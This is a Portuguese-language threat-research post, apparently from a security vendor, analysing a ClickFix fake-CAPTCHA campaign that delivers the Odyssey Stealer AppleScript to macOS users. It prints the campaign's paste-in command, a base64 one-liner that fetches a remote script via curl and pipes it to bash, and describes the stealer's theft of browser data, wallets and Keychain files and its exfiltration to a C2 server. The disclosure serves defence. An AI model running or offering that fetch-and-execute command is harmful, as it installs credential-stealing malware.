Odyssey Stealer: ClickFix Malware Ataca Usuários de macOS para Credenciais e Detalhes de Carteiras de Criptomoedas

Há alguns meses, o X-Labs divulgou uma pesquisa sobre como um ataque ClickFix entregou malware por meio de sistemas Windows. Desde então, os pesquisadores da X-Labs têm monitorado o aumento da atividade de malware na forma de uma campanha de phishing que visa o macOS através de uma técnica ClickFix que entrega malware projetado para roubar credenciais.

O ataque é conduzido usando uma técnica ClickFix onde o atacante constrói uma página falsa de verificação CAPTCHA. Esta técnica é uma mistura de phishing e engenharia social que é executada sem deixar um binário no sistema. A verificação CAPTCHA pode ser criada pelo atacante com base na identificação do sistema operacional.

OAnálise técnica do Odyssey Stealer

Ao navegar inicialmente na URL “hxxps://tradingviewen[.]com” em sistemas Windows e macOS, os usuários são levados a uma página da web onde a verificação CAPTCHA é necessária e pede ao usuário para realizar várias ações.

Página da web após navegação em sistema Windows:

Fig. 1 - Windows instructions
 

Página da web após navegação em sistema macOS

Fig. 2 - macOS instructions
 

Ao realizar a ação necessária e colar o conteúdo em um terminal, obtemos o código abaixo.

• echo "Y3VybCAtcyBodHRwOi8vNDUuMTQ2LjEzMC4xMzEvZC92aXB4MTQzNTAgfCBub2h1cCBiYXNoICY=" | base64 -d | bash

O Base64 no comando resolve para uma URL hospedando um script malicioso.

• echo "curl -s hxxp://45.146.130[.]131/d/vipx14350 | nohup bash &" | base64 -d | bash

A URL “hxxp://45.146.130[.]131/d/vipx14350” hospeda um AppleScript altamente ofuscado. Vamos examinar este AppleScript mais adiante neste post.

Quando navegamos na URL real “hxxps://tradingviewen[.]com”, a página da web detecta o sistema operacional do usuário e exibe instruções personalizadas para macOS ou Windows. Abaixo estão os comandos mostrados quando as operações são realizadas em macOS e Windows.

1- No Windows, quando o usuário realiza a ação win + R, digitando PowerShell, clicando em copiar e colando (ctrl + v), ele apenas cola um comando genérico de string do Windows.

2- No macOS, quando o usuário realiza a ação com command + espaço, abrindo o terminal, clicando em copiar e colando o comando no terminal, ele cola um comando malicioso que é executado usando bash.

Dissecando a carga útil do AppleScript

Quando o comando está sendo executado no terminal, ele pede ao usuário para inserir a senha do usuário para ações adicionais, o que resulta na coleta de dados sensíveis de dispositivos macOS e no envio para o servidor remoto.

Após o download, uma análise inicial do script mostra que é um arquivo compilado AppleScript (.scpt) que usa “osascript” para executar o AppleScript automaticamente. O script tem strings geradas aleatoriamente para fins de ofuscação, tornando a análise mais difícil. No entanto, após limpar as strings excessivas do script, conseguimos analisar com sucesso o comportamento do código.

Inicialmente, o script usa “mkdir” para criar um diretório, especificamente dentro do diretório “/tmp”.

Fig. 3 - Beginning of script & creating directory
 

O principal objetivo do script é ler extensões de navegador, carteiras de criptomoedas e minerar nomes de usuário e senhas.

Coleta geral de arquivos da área de trabalho e documentos

A imagem abaixo mostra a coleta de arquivos da pasta Desktop e Documentos do usuário com base em extensões como .txt, .pdf, .docx, .key e outras.

Além disso, o script também coleta cookies do Safari, notas da Apple e arquivos do Keychain.

Fig. 4 - File collection

Detecção de carteiras de criptomoedas em enumeração de navegadores baseados em Firefox e Chromium

O script também tem como alvo navegadores como Firefox e Chrome para roubar cookies, logins salvos, histórico de formulários, criptografia e chaves de criptografia, copiando-os para o diretório de trabalho temporário, como mostrado nas Figuras 5 e 6.

Ele também tem como alvo navegadores baseados em Chromium, como Google Chrome, Brave, Microsoft Edge, Opera e outros. Ele enumera perfis de usuário e extrai cookies, dados de preenchimento automático, credenciais de login e configurações de extensões. O principal foco nos navegadores baseados em Chromium são as extensões que correspondem a carteiras de criptomoedas conhecidas, como Electrum, Exodus, Litecoin, Wasabi e muitas outras.

Ele escaneia seus diretórios de armazenamento local e indexedDB, garantindo que qualquer informação relacionada à carteira armazenada também seja exfiltrada.

Fig. 5 - Firefox-based data collection

Fig. 6 - Chromium-based Chrome browser enumeration

O processo de exfiltração de dados

Após reunir as informações necessárias, o script configura o mecanismo de exfiltração e empacota tudo em um arquivo ZIP. O arquivo é então salvo em /tmp/out.zip. A função de dados faz upload do arquivo para “hxxp://45.146.130[.]131/log” usando um comando curl.

Fig. 7 - Data exfiltration

Quando tentamos navegar no IP: 45.46.130[.]131, somos levados à página de login do painel de controle do Odyssey Stealer, que o atacante pode acessar para visualizar os dados coletados.

Fig. 8 - Odyssey stealer login page

Limpeza final após a exfiltração de dados

Após os dados serem enviados para o servidor, o script remove o diretório /tmp contendo o arquivo zip e o diretório de trabalho para remover vestígios da atividade, dificultando a análise forense.

Conclusão

Neste post, cobrimos como o ataque ClickFix evoluiu para mudar o foco de atacar máquinas Windows para macOS. Através de técnicas de ofuscação, os atacantes contornam os mecanismos tradicionais de detecção com um ataque de engenharia social baseado em terminal.

Aqui, vimos que o atacante criou uma página falsa de CAPTCHA que verifica o sistema operacional antes da execução adequada do malware. Quando o sistema operacional correto é detectado, a URL atrai os usuários a executar várias instruções mencionadas na página da web e aciona a execução do malware. A execução ocorre seguindo o comando “base64 -d | bash”, que decodifica o código codificado em base64 e o executa no terminal bash. O código decodificado em base64 é um link para um AppleScript malicioso (.scpt) que coleta informações sensíveis, como dados de carteiras de criptomoedas, extensões de navegador, cookies, sessões, keychains salvos, nomes de usuário e senhas do sistema. Após capturar com sucesso os dados, ele armazena os dados salvos em “/tmp/out.zip” e posteriormente exfiltra o arquivo para seu C2.

A lição desta análise técnica: Os atacantes usam uma combinação de técnicas de phishing e engenharia social para contornar métodos comuns de detecção e exfiltrar dados sem a necessidade de deixar binários no sistema.

Declaração de Proteção

• Estágio 2 (Isca) – URLs maliciosas associadas a esses ataques são identificadas e bloqueadas.
• Estágio 5 (Arquivo Dropper) – AppleScript malicioso (.scpt) foi adicionado ao banco de dados malicioso da Forcepoint e está bloqueado.
• Estágio 6 (Chamada para Casa) – Servidores C2 categorizados sob a categoria de segurança e bloqueados.
   

Declaração de Proteção NGFW

O site de phishing é detectado com a impressão digital "File-Text_Information-Stealer-Using-Fake-Browser-Dialogs" desde dynup 1845.

IOCs